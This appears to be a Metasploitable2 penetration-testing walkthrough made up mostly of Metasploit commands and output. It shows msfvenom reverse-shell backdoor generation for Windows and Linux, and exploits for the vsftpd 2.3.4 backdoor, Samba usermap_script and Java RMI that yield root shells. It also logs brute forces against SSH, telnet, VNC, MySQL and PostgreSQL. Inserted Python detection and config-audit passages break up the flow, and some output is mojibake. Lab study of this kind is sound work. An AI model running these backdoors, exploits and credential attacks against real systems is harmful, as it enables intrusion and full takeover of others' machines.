msf6 > setg rhost 192.168.2.219
rhost => 192.168.2.219
run / exploit runs the module
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run
[*] 192.168.2.219:22 - SSH - Using malformed packet technique
[*] 192.168.2.219:22 - SSH - Starting scan
[+] 192.168.2.219:22 - SSH - User 'root' found
[+] 192.168.2.219:22 - SSH - User 'msfadmin' found
[*] Scanned 1 of 1 hosts (100% complete)
MSF penetration
Target: Metasploitable2
1. Weak password vulnerabilities (vnc, mysql, ssh, ftp, etc.)
2. Samba MS-RPC shell command injection vulnerability
3. Vsftpd source package backdoor vulnerability
4. UnrealIRCd backdoor vulnerability
5. Linux NFS shared directory misconfiguration vulnerability
6. Java RMI Server command execution vulnerability
7. Weak root password vulnerability
8. Tomcat manager default credentials vulnerability
9. Distcc backdoor vulnerability
10. Samba symlink default configuration directory traversal vulnerability
11. PHP CGI argument injection vulnerability
12. DRuby remote code execution vulnerability
13. Ingreslock backdoor vulnerability
14. Rlogin backdoor vulnerability
Backdoors
use exploit/multi/handler # use the listener module
Windows backdoor
Set the payload to reverse_tcp
set payload windows/x64/meterpreter/reverse_tcp
Set the parameters
show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (generic/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
set lport 9999
set lhost 192.168.2.200
Run the listener in the background
run -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.2.200:9999
Generate the backdoor program
-p selects a payload; LHOST is the Kali machine's IP; LPORT is the port; -f selects the output format (file type); -o names the output file
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.2.200 lport=9999 -f exe -o winshell2.exe
Run the program on the target host and it connects back to Kali automatically.
Reverse shell
The connection is established after the backdoor is run on the target host.
[*] Sending stage (200262 bytes) to 192.168.2.208
[*] Meterpreter session 1 opened (192.168.2.200:9999 -> 192.168.2.208:49827 ) at 2022-07-13 05:15:58 -0400
Once the meterpreter prompt appears, enter shell to get an interactive shell
meterpreter > shell
Process 2292 created.
Channel 1 created.
Microsoft Windows [�汾 10.0.18363.592]
(c) 2019 Microsoft Corporation����������Ȩ����
C:\Users\Administrator\Desktop>whoami
whoami
win10x64-edu\administrator
If the output is garbled, enter chcp 65001 to switch to UTF-8
Check network connections
The established connection 192.168.2.208:49938 -> 192.168.2.200:9999 is visible
C:\Users\Administrator\Desktop>netstat -ano
netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 864
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 444
TCP 192.168.2.208:49926 52.231.199.126:443 TIME_WAIT 0
TCP 192.168.2.208:49938 192.168.2.200:9999 ESTABLISHED 4652
Check the running process
C:\Users\Administrator\Desktop>tasklist |findstr winshell
tasklist |findstr winshell
winshell.exe 4652 Console 1 1,888 K
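The manual netstat -ano / tasklist check above can be automated on the defender's side. This added Python example (not part of the original post) parses both outputs, reports ESTABLISHED connections to remote ports outside an expected set, and maps each to its owning image name; the two samples are constructed from the output shown above, and EXPECTED_REMOTE_PORTS is an assumed allow-list to tune per environment.

```python
"""Flag established outbound connections to unexpected ports and map them
to their owning process, automating the `netstat -ano` + `tasklist` check
done by hand above. Added example, not part of the original post; both
samples below are constructed from the command output shown on the page.
"""
import re

# Constructed sample of `netstat -ano` output on the Windows host.
NETSTAT_SAMPLE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       864
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       444
  TCP    192.168.2.208:49926    52.231.199.126:443     TIME_WAIT       0
  TCP    192.168.2.208:49938    192.168.2.200:9999     ESTABLISHED     4652
  TCP    [::]:135               [::]:0                 LISTENING       864
"""

# Constructed sample of `tasklist` output on the same host.
TASKLIST_SAMPLE = """
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System                           4 Services                   0      1,888 K
svchost.exe                    864 Services                   0     12,004 K
winshell.exe                  4652 Console                    1      1,888 K
"""

# Assumed allow-list: remote ports on which ordinary client traffic from a
# workstation is expected. Any other ESTABLISHED connection is reported.
EXPECTED_REMOTE_PORTS = {22, 25, 53, 80, 443, 587, 993}

# TCP rows only: UDP rows carry no State column and need a separate pattern.
NETSTAT_TCP_RE = re.compile(
    r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s+(\d+)\s*$")
TASKLIST_RE = re.compile(r"^(\S.*?)\s+(\d+)\s+\S+\s+\d+\s+[\d,]+ K\s*$")


def parse_netstat(text):
    """Return a list of TCP connection dicts parsed from `netstat -ano`."""
    conns = []
    for line in text.splitlines():
        m = NETSTAT_TCP_RE.match(line)
        if not m:
            continue
        laddr, lport, raddr, rport, state, pid = m.groups()
        conns.append({"laddr": laddr, "lport": int(lport),
                      "raddr": raddr, "rport": int(rport),
                      "state": state, "pid": int(pid)})
    return conns


def parse_tasklist(text):
    """Return {pid: image name} parsed from `tasklist`."""
    procs = {}
    for line in text.splitlines():
        m = TASKLIST_RE.match(line)
        if m:
            procs[int(m.group(2))] = m.group(1)
    return procs


def suspicious_connections(netstat_text, tasklist_text,
                           expected_ports=EXPECTED_REMOTE_PORTS):
    """ESTABLISHED connections whose remote port is outside expected_ports,
    each annotated with the image name that owns the PID."""
    procs = parse_tasklist(tasklist_text)
    findings = []
    for c in parse_netstat(netstat_text):
        if c["state"] != "ESTABLISHED" or c["rport"] in expected_ports:
            continue
        findings.append(dict(c, image=procs.get(c["pid"], "<unknown>")))
    return findings


if __name__ == "__main__":
    for f in suspicious_connections(NETSTAT_SAMPLE, TASKLIST_SAMPLE):
        print("%s:%d -> %s:%d  pid=%d  image=%s" % (
            f["laddr"], f["lport"], f["raddr"], f["rport"], f["pid"], f["image"]))
```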
Linux backdoor
Set the payload to reverse_tcp
set payload linux/x64/meterpreter/reverse_tcp
Start the listener
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.2.200:6666
Generate the backdoor
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.2.200 LPORT=6666 -f elf > mshell.elf
Reverse shell
[*] Sending stage (3020772 bytes) to 192.168.2.195
[*] Meterpreter session 4 opened (192.168.2.200:6666 -> 192.168.2.233:41812 ) at 2022-07-13 05:53:49 -0400
meterpreter >
meterpreter > sysinfo
Computer : 192.168.2.233
OS : Ubuntu 20.04 (Linux 5.15.0-41-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > ifconfig
Interface 1
============
Name : lo
Hardware MAC : 00:00:00:00:00:00
MTU : 65536
Flags : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::
Interface 2
============
Name : ens33
Hardware MAC : 00:0c:29:5f:88:e7
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.2.233
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::7a92:8c02:6e42:766f
IPv6 Netmask : ffff:ffff:ffff:ffff::
Check network connections
meterpreter > netstat -antpl
Connection list
===============
Proto Local address Remote address State User Inode PID/Program name
----- ------------- -------------- ----- ---- ----- ----------------
tcp 0.0.0.0:9080 0.0.0.0:* LISTEN 0 0
tcp 127.0.0.1:5445 0.0.0.0:* LISTEN 0 0
tcp 127.0.0.1:5538 0.0.0.0:* LISTEN 0 0
tcp 0.0.0.0:22 0.0.0.0:* LISTEN 0 0
tcp 127.0.0.53:53 0.0.0.0:* LISTEN 101 0
tcp 192.168.2.233:55232 192.168.2.200:6666 ESTABLISHED 0 0
tcp 127.0.0.1:37494 127.0.0.1:8090 ESTABLISHED 0 0
FTP backdoor
Target server: Linux; vulnerable service: VSFTPD 2.3.4, commonly known as the smiley-face backdoor
nmap scan of ports and versions
msf6 > db_nmap -sS -sV 192.168.2.219
[*] Nmap: Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-13 21:07 EDT
[*] Nmap: Nmap scan report for 192.168.2.219
[*] Nmap: Host is up (0.0026s latency).
[*] Nmap: Not shown: 977 closed tcp ports (reset)
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp vsftpd 2.3.4
[*] Nmap: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: 23/tcp open telnet Linux telnetd
[*] Nmap: 25/tcp open smtp Postfix smtpd
[*] Nmap: 53/tcp open domain ISC BIND 9.4.2
[*] Nmap: 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
Configure the backdoor exploit module vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > hosts 192.168.2.219 -R
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.2.219 00:0c:29:b0:76:35 Linux server
RHOSTS => 192.168.2.219
Run the exploit
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.2.219:21 - The port used by the backdoor bind listener is already open
[+] 192.168.2.219:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
Reverse shell
[*] Command shell session 1 opened (192.168.2.200:40547 -> 192.168.2.219:6200 ) at 2022-07-13 21:11:04 -0400
id
uid=0(root) gid=0(root)
whoami
root
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
Hardening
vim /etc/vsftpd.conf
Change local_enable=YES to local_enable=NO
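To make the hardening step above checkable rather than a one-line edit, here is an added example (editor's code, not from the original page) that parses a vsftpd.conf and reports the settings a reviewer would question, with a permissive configuration beside a tightened one. Both configuration texts are constructed; the option names are real vsftpd.conf keys, and absent options are treated as NO, which is an assumption to verify against the installed version's defaults. One caveat the page does not state: the change above only disables local-user logins, while the backdoor in the trojaned 2.3.4 release is triggered by the username sent in the USER command, before any login decision, so the affected package itself has to be replaced with a clean build.

```python
"""Audit a vsftpd.conf for settings that widen FTP exposure.

Added example (editor's code, not part of the original page). The two
configuration texts are constructed; the option names are real vsftpd.conf
keys. Options absent from the file are treated as NO here (an assumption),
so check the defaults of the vsftpd version actually installed.
"""

# Constructed: a permissive configuration of the kind the page's lab runs.
WEAK_CONF = """\
# vsftpd.conf (constructed example)
listen=YES
anonymous_enable=YES
anon_upload_enable=YES
local_enable=YES
write_enable=YES
"""

# Constructed: the same file after the page's local_enable change plus a
# few further tightenings.
HARDENED_CONF = """\
listen=YES
anonymous_enable=NO
anon_upload_enable=NO
local_enable=NO
write_enable=NO
chroot_local_user=YES
ssl_enable=YES
"""


def parse_vsftpd_conf(text: str) -> dict:
    """Return {option: value} from key=value lines, skipping comments and blanks."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf[key.strip()] = value.strip()
    return conf


def audit_vsftpd(conf: dict) -> list:
    """Return (option, value, reason) tuples for settings worth questioning."""
    def enabled(key):
        return conf.get(key, "NO").upper() == "YES"

    findings = []
    if enabled("anonymous_enable"):
        findings.append(("anonymous_enable", "YES", "anonymous logins are allowed"))
        if enabled("anon_upload_enable"):
            findings.append(("anon_upload_enable", "YES", "anonymous users may upload files"))
    if enabled("local_enable"):
        findings.append(("local_enable", "YES", "system accounts can log in over FTP"))
        if not enabled("chroot_local_user"):
            findings.append(("chroot_local_user", conf.get("chroot_local_user", "NO"),
                             "local users are not confined to their home directories"))
        if not enabled("ssl_enable"):
            findings.append(("ssl_enable", conf.get("ssl_enable", "NO"),
                             "system account passwords cross the network in cleartext"))
    if enabled("write_enable"):
        findings.append(("write_enable", "YES", "write commands (STOR, DELE, ...) are enabled"))
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_vsftpd(parse_vsftpd_conf(text)) or "no findings")
```

Run it against a real /etc/vsftpd.conf by passing the file's contents to parse_vsftpd_conf; an empty findings list for the hardened text is the expected result, and the weak text reproduces the exposure the page exploits (local logins plus anonymous upload, all in cleartext).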
Intrusion
nmap port scan
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.2.219 21 tcp ftp open vsftpd 2.3.4
192.168.2.219 22 tcp ssh open OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
192.168.2.219 23 tcp telnet open Linux telnetd
192.168.2.219 25 tcp smtp open Postfix smtpd
192.168.2.219 53 tcp domain open ISC BIND 9.4.2
192.168.2.219 80 tcp http open Apache httpd 2.2.8 (Ubuntu) DAV/2
192.168.2.219 111 tcp rpcbind open 2 RPC #100000
192.168.2.219 139 tcp netbios-ssn open Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.168.2.219 445 tcp netbios-ssn open Samba smbd 3.X - 4.X workgroup: WORKGROUP
192.168.2.219 512 tcp exec open netkit-rsh rexecd
192.168.2.219 513 tcp login open OpenBSD or Solaris rlogind
192.168.2.219 514 tcp tcpwrapped open
192.168.2.219 1099 tcp java-rmi open GNU Classpath grmiregistry
192.168.2.219 1524 tcp bindshell open Metasploitable root shell
192.168.2.219 2049 tcp nfs open 2-4 RPC #100003
192.168.2.219 2121 tcp ftp open ProFTPD 1.3.1
192.168.2.219 3306 tcp mysql open 5.0.51a-3ubuntu5
192.168.2.219 3632 tcp open
192.168.2.219 5432 tcp postgresql open PostgreSQL DB 8.3.0 - 8.3.7
192.168.2.219 5900 tcp vnc open VNC protocol 3.3
192.168.2.219 6000 tcp x11 open access denied
192.168.2.219 6667 tcp irc open UnrealIRCd
192.168.2.219 6697 tcp open
192.168.2.219 8009 tcp ajp13 open Apache Jserv Protocol v1.3
192.168.2.219 8180 tcp http open Apache Tomcat/Coyote JSP engine 1.1
192.168.2.219 8787 tcp open
SSH brute force
Configure the ssh_login module
msf6 auxiliary(scanner/ssh/ssh_login) > set pass_file /root/Desktop/passwd.txt
pass_file => /root/Desktop/passwd.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set user_file /root/Desktop/username.txt
user_file => /root/Desktop/username.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.2.219
rhosts => 192.168.2.219
Run the brute force
msf6 auxiliary(scanner/ssh/ssh_login) > run
[*] 192.168.2.219:22 - Starting bruteforce
[+] 192.168.2.219:22 - Success: 'root:qwer' 'uid=0(root) gid=0(root) groups=0(root) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] SSH session 1 opened (192.168.2.200:35807 -> 192.168.2.219:22 ) at 2022-07-13 21:34:32 -0400
[+] 192.168.2.219:22 - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] SSH session 2 opened (192.168.2.200:38467 -> 192.168.2.219:22 ) at 2022-07-13 21:34:41 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
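The sweep above leaves a distinctive trace in the target's sshd log: a run of failed password logins from one source, followed by an accepted login for root. As an added example (editor's code, not part of the original page), the following detector parses such lines with a sliding window per source address and raises a medium alert on a burst of failures and a high alert when a login is accepted while that source still has a burst outstanding. The log lines are constructed to mirror the page's scenario. The same logic serves the telnet, VNC, MySQL and PostgreSQL sweeps in the sections below; only the log source and the line format change.

```python
"""Detect password-guessing and guess-then-success patterns in sshd logs.

Added example (editor's code, not part of the original page). The log
lines are constructed in syslog format to mirror the page's ssh_login run.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd log lines modelled on the page's scenario: a password
# sweep from 192.168.2.200 that ends with accepted logins for root and msfadmin.
SAMPLE_AUTH_LOG = """\
Jul 13 21:34:20 metasploitable sshd[5120]: Failed password for root from 192.168.2.200 port 35790 ssh2
Jul 13 21:34:21 metasploitable sshd[5122]: Failed password for root from 192.168.2.200 port 35792 ssh2
Jul 13 21:34:22 metasploitable sshd[5124]: Failed password for invalid user kali from 192.168.2.200 port 35794 ssh2
Jul 13 21:34:23 metasploitable sshd[5126]: Failed password for invalid user guest from 192.168.2.200 port 35796 ssh2
Jul 13 21:34:24 metasploitable sshd[5128]: Failed password for root from 192.168.2.200 port 35798 ssh2
Jul 13 21:34:32 metasploitable sshd[5130]: Accepted password for root from 192.168.2.200 port 35807 ssh2
Jul 13 21:34:41 metasploitable sshd[5132]: Accepted password for msfadmin from 192.168.2.200 port 38467 ssh2
Jul 13 21:40:02 metasploitable sshd[5140]: Accepted publickey for msfadmin from 192.168.2.10 port 50122 ssh2
Jul 13 21:40:05 metasploitable CRON[5150]: pam_unix(cron:session): session opened for user root by (uid=0)
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)


def parse_line(line: str):
    """Return a dict for sshd login outcomes, or None for unrelated lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    # syslog timestamps carry no year; year 1900 is fine for intra-window deltas
    ev["ts"] = datetime.strptime(ev["ts"], "%b %d %H:%M:%S")
    return ev


def detect_bruteforce(lines, threshold: int = 5, window_seconds: int = 60) -> list:
    """Sliding-window detector over lines in log order. Alert kinds:

    burst                  : threshold failures from one IP inside the window
    success_after_failures : a login accepted while that IP still has
                             threshold or more failures inside the window
    """
    recent = defaultdict(deque)   # ip -> timestamps of failures still in the window
    burst_reported = set()
    alerts = []
    for ev in filter(None, map(parse_line, lines)):
        q = recent[ev["ip"]]
        while q and (ev["ts"] - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if ev["result"] == "Failed":
            q.append(ev["ts"])
            if len(q) >= threshold and ev["ip"] not in burst_reported:
                burst_reported.add(ev["ip"])
                alerts.append({"kind": "burst", "severity": "medium", "ip": ev["ip"],
                               "user": ev["user"],
                               "detail": f"{len(q)} failed logins within {window_seconds}s"})
        elif len(q) >= threshold:
            alerts.append({"kind": "success_after_failures", "severity": "high",
                           "ip": ev["ip"], "user": ev["user"],
                           "detail": f"{ev['method']} login accepted after {len(q)} failures"})
    return alerts


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_AUTH_LOG.splitlines()):
        print(a["severity"], a["kind"], a["ip"], a["user"], a["detail"])
```

The "success after failures" alert is the one worth paging on: a burst alone is background noise on any Internet-facing host, but an accepted password login from the same source inside the window is exactly what the module output above shows for root:qwer. The detector assumes lines arrive in log order and does not resolve the missing syslog year, which is adequate for the short windows used here.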
Telnet brute force
Configure the telnet_login module
msf6 auxiliary(scanner/telnet/telnet_login) > set rhosts 192.168.2.219
rhosts => 192.168.2.219
msf6 auxiliary(scanner/telnet/telnet_login) > set user_file /root/Desktop/username.txt
user_file => /root/Desktop/username.txt
msf6 auxiliary(scanner/telnet/telnet_login) > set pass_file /root/Desktop/passwd.txt
pass_file => /root/Desktop/passwd.txt
Run the brute force
msf6 auxiliary(scanner/telnet/telnet_login) > run
[-] 192.168.2.219:23 - 192.168.2.219:23 - LOGIN FAILED: kali:admin (Incorrect: )
[-] 192.168.2.219:23 - 192.168.2.219:23 - LOGIN FAILED: kali:password (Incorrect: )
[-] 192.168.2.219:23 - 192.168.2.219:23 - LOGIN FAILED: kali:Admin@123 (Incorrect: )
[-] 192.168.2.219:23 - 192.168.2.219:23 - LOGIN FAILED: kali:qwer (Incorrect: )
[-] 192.168.2.219:23 - 192.168.2.219:23 - LOGIN FAILED: kali:msfadmin (Incorrect: )
[-] 192.168.2.219:23 - 192.168.2.219:23 - LOGIN FAILED: guest:admin (Incorrect: )
[-] 192.168.2.219:23 - 192.168.2.219:23 - LOGIN FAILED: guest:password (Incorrect: )
[-] 192.168.2.219:23 - 192.168.2.219:23 - LOGIN FAILED: guest:Admin@123 (Incorrect: )
[-] 192.168.2.219:23 - 192.168.2.219:23 - LOGIN FAILED: guest:qwer (Incorrect: )
[-] 192.168.2.219:23 - 192.168.2.219:23 - LOGIN FAILED: guest:msfadmin (Incorrect: )
[-] 192.168.2.219:23 - 192.168.2.219:23 - LOGIN FAILED: root:admin (Incorrect: )
[-] 192.168.2.219:23 - 192.168.2.219:23 - LOGIN FAILED: root:password (Incorrect: )
[-] 192.168.2.219:23 - 192.168.2.219:23 - LOGIN FAILED: root:Admin@123 (Incorrect: )
[+] 192.168.2.219:23 - 192.168.2.219:23 - Login Successful: root:qwer
[*] 192.168.2.219:23 - Attempting to start session 192.168.2.219:23 with root:qwer
[*] Command shell session 3 opened (192.168.2.200:40915 -> 192.168.2.219:23 ) at 2022-07-13 21:48:00 -0400
VNC brute force
Configure the vnc_login module
msf6 auxiliary(scanner/vnc/vnc_login) > setg pass_file /root/Desktop/passwd.txt
pass_file => /root/Desktop/passwd.txt
msf6 auxiliary(scanner/vnc/vnc_login) > setg user_file /root/Desktop/username.txt
user_file => /root/Desktop/username.txt
msf6 auxiliary(scanner/vnc/vnc_login) > setg rhosts 192.168.2.219
rhosts => 192.168.2.219
msf6 auxiliary(scanner/vnc/vnc_login) > run
[*] 192.168.2.219:5900 - 192.168.2.219:5900 - Starting VNC login sweep
[-] 192.168.2.219:5900 - 192.168.2.219:5900 - LOGIN FAILED: :admin (Incorrect: Authentication failed)
[+] 192.168.2.219:5900 - 192.168.2.219:5900 - Login Successful: :password
[-] 192.168.2.219:5900 - 192.168.2.219:5900 - LOGIN FAILED: :Admin@123 (Incorrect: Authentication failed)
[-] 192.168.2.219:5900 - 192.168.2.219:5900 - LOGIN FAILED: :qwer (Incorrect: Authentication failed)
Log in with vncviewer
vncviewer 192.168.2.219
Samba 3.0 command execution
Configure the usermap_script module
msf6 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.2.219 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.2.200 yes The listen address (an interface may be specified)
LPORT 9999 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
Reverse shell
msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP handler on 192.168.2.200:9999
[*] Command shell session 5 opened (192.168.2.200:9999 -> 192.168.2.219:60259 ) at 2022-07-13 22:07:05 -0400
id
uid=0(root) gid=0(root)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
netstat -antpl
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:512 0.0.0.0:* LISTEN 5032/xinetd
tcp 0 0 0.0.0.0:513 0.0.0.0:* LISTEN 5032/xinetd
tcp 0 0 192.168.2.219:23 192.168.2.200:37609 ESTABLISHED 5586/in.telnetd: 19
tcp 0 0 192.168.2.219:60259 192.168.2.200:9999 ESTABLISHED 5698/nc
tcp 1 0 192.168.2.219:139 192.168.2.200:32987 CLOSE_WAIT 5694/smbd
MySQL brute force
Configure the mysql_login module
msf6 auxiliary(scanner/mysql/mysql_login) > show options
Module options (auxiliary/scanner/mysql/mysql_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
PASSWORD no A specific password to authenticate with
PASS_FILE /root/Desktop/passwd.txt no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.2.219 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 3306 yes The target port (TCP)
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME root no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /root/Desktop/username.txt no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts
Run the brute force
msf6 auxiliary(scanner/mysql/mysql_login) > run
[+] 192.168.2.219:3306 - 192.168.2.219:3306 - Found remote MySQL version 5.0.51a
[+] 192.168.2.219:3306 - 192.168.2.219:3306 - Success: 'root:'
[-] 192.168.2.219:3306 - 192.168.2.219:3306 - LOGIN FAILED: kali: (Incorrect: Access denied for user 'kali'@'192.168.2.200' (using password: NO))
[+] 192.168.2.219:3306 - 192.168.2.219:3306 - Success: 'guest:'
[-] 192.168.2.219:3306 - 192.168.2.219:3306 - LOGIN FAILED: msfadmin: (Incorrect: Access denied for user 'msfadmin'@'192.168.2.200' (using password: NO))
[-] 192.168.2.219:3306 - 192.168.2.219:3306 - LOGIN FAILED: msfadmin:admin (Incorrect: Access denied for user 'msfadmin'@'192.168.2.200' (using password: YES))
PostgreSQL brute force
Configure the postgres_login module
msf6 auxiliary(scanner/postgres/postgres_login) > show options
Module options (auxiliary/scanner/postgres/postgres_login):
Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DATABASE template1 yes The database to authenticate against
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
PASSWORD no A specific password to authenticate with
PASS_FILE none no File containing passwords, one per line
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RETURN_ROWSET true no Set to true to see query result sets
RHOSTS 192.168.2.219 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 5432 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no A specific username to authenticate as
USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/postgres_default_userpass.txt no File containing (space-separated) users and passwords, one pair per line
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /root/Desktop/username.txt no File containing users, one per line
VERBOSE true yes Whether to print output for all attempts
Run the brute force
msf6 auxiliary(scanner/postgres/postgres_login) > run
[-] 192.168.2.219:5432 - LOGIN FAILED: kali:admin@template1 (Incorrect: Invalid username or password)
[-] 192.168.2.219:5432 - LOGIN FAILED: kali:password@template1 (Incorrect: Invalid username or password)
[-] 192.168.2.219:5432 - LOGIN FAILED: kali:Admin@123@template1 (Incorrect: Invalid username or password)
[-] 192.168.2.219:5432 - LOGIN FAILED: kali:qwer@template1 (Incorrect: Invalid username or password)
[-] 192.168.2.219:5432 - LOGIN FAILED: admin:qwer@template1 (Incorrect: Invalid username or password)
[-] 192.168.2.219:5432 - LOGIN FAILED: admin:msfadmin@template1 (Incorrect: Invalid username or password)
[+] 192.168.2.219:5432 - Login Successful: postgres:postgres@template1
[-] 192.168.2.219:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: Invalid username or password)
Java RMI command execution
Configure the java_rmi_server module
msf6 exploit(multi/misc/java_rmi_server) > show options
Module options (exploit/multi/misc/java_rmi_server):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 yes Time that the HTTP Server will wait for the payload request
RHOSTS 192.168.2.219 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 1099 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.2.200 yes The listen address (an interface may be specified)
LPORT 9999 yes The listen port
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
Reverse shell
msf6 exploit(multi/misc/java_rmi_server) > run
[*] Started reverse TCP handler on 192.168.2.200:9999
[*] 192.168.2.219:1099 - Using URL: http://192.168.2.200:8080/9gVp6zs4tG4
[*] 192.168.2.219:1099 - Server started.
[*] 192.168.2.219:1099 - Sending RMI Header...
